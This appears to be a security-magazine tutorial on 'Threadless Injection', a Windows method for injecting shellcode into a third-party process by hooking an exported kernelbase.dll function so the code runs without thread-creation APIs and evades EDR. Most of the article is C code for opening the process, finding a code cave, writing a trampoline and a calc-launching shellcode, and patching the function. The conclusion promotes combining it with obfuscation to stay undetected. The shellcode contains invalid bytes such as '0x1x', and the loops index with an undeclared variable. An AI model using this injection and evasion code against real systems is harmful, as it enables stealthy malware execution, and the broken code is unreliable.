Threadless Injection. Injecting shellcode into third-party processes to circumvent EDR

Date: 07/05/2025

This article discusses Threadless Injection: a technique making it possible to make injections into third-party processes. At the time of writing, it effectively worked on Windows 11 23H2 x64 running on a virtual machine isolated from the network with OS security features enabled.

info

Also see my previous article describing the Process Ghosting injection technique.

The standard shellcode injection procedure and subsequent shellcode execution involve the following steps:

  1. Get a process handle (OpenProcess and NtOpenProcess);
  2. Allocate memory for payload (VirtualAllocEx and NtMapViewOfSection);
  3. Write payload to the allocated memory (WriteProcessMemory and Ghost Writing); and 
  4. Execute shellcode (CreateRemoteThread and NtQueueApcThread).

Needless to say that this sequence of actions is well-known to EDR tools; if some program implements it, a red flag is immediately raised, and the process is terminated.

Is it possible to write code that performs the same actions but doesn’t directly use the above-listed WinAPI functions? For the first three steps, such a task is feasible, but when it comes to shellcode execution, problems arise. If a program directly calls the CreateRemoteThread/NtQueueApcThread functions, EDR will ring the alarm bell with a 100% guarantee.

So, to fool the defense, this chain of actions has to be broken somehow. For example, you can try to intercept some API calls in a third-party app, in an exported DLL function, and then make this function work for you…

warning

This article is intended for security specialists operating under a contract; all information provided in it is for educational purposes only. Neither the author nor the Editorial Board can be held liable for any damages caused by improper usage of this publication. Distribution of malware, disruption of systems, and violation of secrecy of correspondence are prosecuted by law.

The idea is as follows: you patch network functions of some legitimate software that already interacts with the network and then use these functions to communicate with your network resources. This is the essence of the Threadless Injection technique: you patch exported functions of a dynamic library used by a third-party process so that your code is executed when these functions are called. Its implementation involves the following steps:

  1. Find a code cave that can accommodate your shellcode and trampoline;
  2. Write the shellcode and trampoline to this memory area;
  3. Patch an exported DLL function to make it execute your code; and 
  4. Wait for this function to be called, which will trigger shellcode execution.

But dynamic libraries can contain hundreds and thousands of functions, and a randomly selected function might be unsuitable for your purposes. Who can guarantee that it will be called within a reasonable period of time (or will be called at all)?..

To solve this issue, you have to examine the software you are going to use to intercept an exported function. Ideally, you need an app that calls certain DLL functions on a regular basis (e.g. when it accesses its temporary file on the disk and writes intermediate results to it or checks the availability of its servers on the network by calling the respective API at a certain interval). If you find such a function, you can be sure that the required call will occur before long.

On the other hand, this rule shouldn’t be abused: if an app calls some API too often (e.g. several times per second), and you try to intercept such a call, glitches are inevitable.

To conduct such a research, let’s use API Monitor. This program shows in real time how a WinAPI is called and what actions in the test program affect this call. In addition, you can see what DLLs are attached to the process and what APIs do they implement (i.e. you see not just a list of WinAPIs whose origin is unknown). Based on the monitoring data, you can decide which function from the library export is suitable for your purposes and should be intercepted.

API Monitor
API Monitor

Once you examine the test program and identify the required WinAPIs, you can start coding.

Coding

Let’s implement each step required to perform Threadless Injection in code.

First, you have to get a handle of the target process by its name:

HANDLE hProc = NULL;
LPCWSTR ps_name;
DWORD *procID;
PROCESSENTRY32 pe32;
pe32.dwSize = sizeof(PROCESSENTRY32);
HANDLE process_snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (!process_snap) return NULL;
if (Process32First(process_snap, &pe32)) {
do {
if (_wcsicmp(pe32.szExeFile, ps_name) == 0) {
*procID = pe32.th32ProcessID;
hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, *procID);
if (!hProc) continue;
return hProc;
}
} while (Process32Next(process_snap, &pe32));
}

Then you load the selected dynamic library whose export contains the API function required for your purposes (e.g. kernelbase.dll).

HMODULE hModule = GetModuleHandleW(L"kernelbase.dll");
if (hModule == NULL)
hModule = LoadLibraryW(L"kernelbase.dll");

Next, you get the address of your API in the DLL:

// victim_export_func is a function from the kernelbase.dll export that will be hooked
void* dll_export_fun_addr = GetProcAddress(hModule, victim_export_func);
if (dll_export_fun_addr == NULL) return 1;

Searching for a code cave (i.e. memory area where you can write your data):

UINT_PTR addr_of_codecave;
uint64_t function_addr;
BOOL gotchaCave;
// Start search
for (addr_of_codecave = (function_addr & 0xFFFFFFFFFFF70000) - 0x70000000;
// Address range
addr_of_codecave < function_addr + 0x70000000;
// Memory browsing increment
addr_of_codecave += 0x10000)
{
LPVOID lpAddr = VirtualAllocEx(hProc,
addr_of_codecave,
size,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
if (lpAddr == NULL) continue;
gotchaCave = TRUE;
break;
}
if (gotchaCave == TRUE) return addr_of_codecave;

The next step involves manipulations with the trampoline and other arithmetic. To make it clear, let’s denote the trampoline and the payload. I am going to use a standard payload frequently used in PoC demos that starts Calculator. The trampoline balances the stack, saves registers, and restores them after calling the payload:

unsigned char tramp_to_shellcode[] = {
0x58, 0x48, 0x83, 0xE8, 0x05, 0x50,
0x51, 0x52, 0x41, 0x50, 0x41, 0x51,
0x41, 0x52, 0x41, 0x53, 0x48, 0xB9,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x48, 0x89, 0x08, 0x48,
0x83, 0xEC, 0x40, 0xE8, 0x11, 0x00,
0x00, 0x00, 0x48, 0x83, 0xC4, 0x40,
0x41, 0x5B, 0x41, 0x5A, 0x41, 0x59,
0x41, 0x58, 0x5A, 0x59, 0x58, 0xFF,
0xE0, 0x90
};
unsigned char shellcode[] = {
0x53, 0x56, 0x57, 0x55, 0x54, 0x58,
0x66, 0x83, 0xE4, 0xF0, 0x50, 0x6A,
0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C,
0x63, 0x54, 0x59, 0x48, 0x29, 0xD4,
0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B,
0x76, 0x18, 0x48, 0x8B, 0x76, 0x10,
0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48,
0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C,
0x8B, 0x5C, 0x17, 0x28, 0x8B, 0x74,
0x1x, 0x20, 0x48, 0x01, 0xFE, 0x8B,
0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C,
0x1x, 0x8D, 0x52, 0x02, 0xAD, 0x81,
0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45,
0x7x, 0xEF, 0x8B, 0x74, 0x1F, 0x1C,
0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE,
0x4x, 0x01, 0xF7, 0x99, 0xFF, 0xD7,
0x48, 0x83, 0xC4, 0x68, 0x5C, 0x5D,
0x5x, 0x5E, 0x5B, 0xC3
};

Reading the beginning of the function exported from the DLL and configuring the trampoline using the obtained data:

int64_t originalBytes = *(int64_t*)dll_export_fun_addr;
// The trampoline isn't damaged: the space in it at this offset is reserved by zeros
*(uint64_t*)(tramp_to_shellcode + 0x12) = originalBytes;

Configuring memory and granting it the PAGE_EXECUTE_READWRITE rights to set the hook:

DWORD saveProtectFlags = 0;
if (!VirtualProtectEx(hProc, dll_export_fun_addr, 8, PAGE_EXECUTE_READWRITE, &saveProtectFlags)) return 1;

Creating a hook (call) in the function exported by the attacked library and configuring it:

// Call function opcode
unsigned char call_opcode_to_shell[] = { 0xe8, 0, 0, 0, 0 };
int call_addr = (remoteAddress - ((UINT_PTR)dll_export_fun_addr + 5));
// Configuring the call
*(int*)(call_opcode_to_shell + 1) = call_addr;

Writing the trampoline and payload and then changing the target memory attributes: first to PAGE_EXECUTE_READWRITE and then back to PAGE_EXECUTE_READ (when the job is done):

VirtualProtectEx(hProc,
call_opcode_to_shell,
sizeof(call_opcode_to_shell),
PAGE_EXECUTE_READWRITE,
NULL);
if (!WriteProcessMemory(hProc,
dll_export_fun_addr,
call_opcode_to_shell,
sizeof(call_opcode_to_shell),
&numOfWrittenBytes))
return 1;
unsigned char mypayload[sizeof(tramp_to_shellcode) + sizeof(shellcode)];
// In these two loops, one large payload containing both the shellcode and the trampoline is created.
for (size_t x = 0; x < sizeof(tramp_to_shellcode); ++x)
mypayload[i] = tramp_to_shellcode[i];
for (size_t x = 0; x < sizeof(shellcode); ++x)
mypayload[sizeof(shellcode) + i] = shellcode[i];
// Change memory access flags to enable writing
if (!VirtualProtectEx(hProc,
remoteAddress,
sizeof(mypayload),
PAGE_READWRITE,
&saveProtectFlags))
return 1;
// Write payload
if (!WriteProcessMemory(hProc,
remoteAddress,
mypayload,
sizeof(mypayload),
&numOfWrittenBytes))
return 1;
// Revert memory access rights
if (!VirtualProtectEx(hProc,
remoteAddress,
sizeof(mypayload),
PAGE_EXECUTE_READ,
&saveProtectFlags))
return 1;

Congrats! Now all you have to do is wait for the app to call the patched function. You won’t have to wait for long since the modified API is called on a regular basis (as confirmed by API Monitor).

Conclusions

Now you are familiar with the Threadless Injection technique that can be implemented without explicitly calling thread creation functions. This breaks the standard injection stereotype and enables you to avoid detection and continue doing your job.

Of course, the above code is just a demonstration – a template that requires significant improvements to achieve true invisibility. This technique is neither a panacea nor a silver bullet that completely conceals your code. Remember: to give the Red Team a chance to win, all available techniques (injections, API calls, code obfuscation, etc., etc.) should be used in deadly combinations. Good luck!

Related posts:
2023.02.21 — Pivoting District: GRE Pivoting over network equipment

Too bad, security admins often don't pay due attention to network equipment, which enables malefactors to hack such devices and gain control over them. What…

Full article →
2022.06.01 — Log4HELL! Everything you must know about Log4Shell

Up until recently, just a few people (aside from specialists) were aware of the Log4j logging utility. However, a vulnerability found in this library attracted to it…

Full article →
2022.02.09 — First contact: An introduction to credit card security

I bet you have several cards issued by international payment systems (e.g. Visa or MasterCard) in your wallet. Do you know what algorithms are…

Full article →
2023.04.04 — Serpent pyramid. Run malware from the EDR blind spots!

In this article, I'll show how to modify a standalone Python interpreter so that you can load malicious dependencies directly into memory using the Pyramid…

Full article →
2023.01.22 — Top 5 Ways to Use a VPN for Enhanced Online Privacy and Security

This is an external third-party advertising publication. In this period when technology is at its highest level, the importance of privacy and security has grown like never…

Full article →
2022.06.01 — WinAFL in practice. Using fuzzer to identify security holes in software

WinAFL is a fork of the renowned AFL fuzzer developed to fuzz closed-source programs on Windows systems. All aspects of WinAFL operation are described in the official documentation,…

Full article →
2022.06.01 — Cybercrime story. Analyzing Plaso timelines with Timesketch

When you investigate an incident, it's critical to establish the exact time of the attack and method used to compromise the system. This enables you to track the entire chain of operations…

Full article →
2023.04.20 — Sad Guard. Identifying and exploiting vulnerability in AdGuard driver for Windows

Last year, I discovered a binary bug in the AdGuard driver. Its ID in the National Vulnerability Database is CVE-2022-45770. I was disassembling the ad blocker and found…

Full article →
2023.03.03 — Infiltration and exfiltration. Data transmission techniques used in pentesting

Imagine a situation: you managed to penetrate the network perimeter and gained access to a server. This server is part of the company's internal network, and, in theory, you could…

Full article →
2022.01.12 — First contact. Attacks against contactless cards

Contactless payment cards are very convenient: you just tap the terminal with your card, and a few seconds later, your phone rings indicating that…

Full article →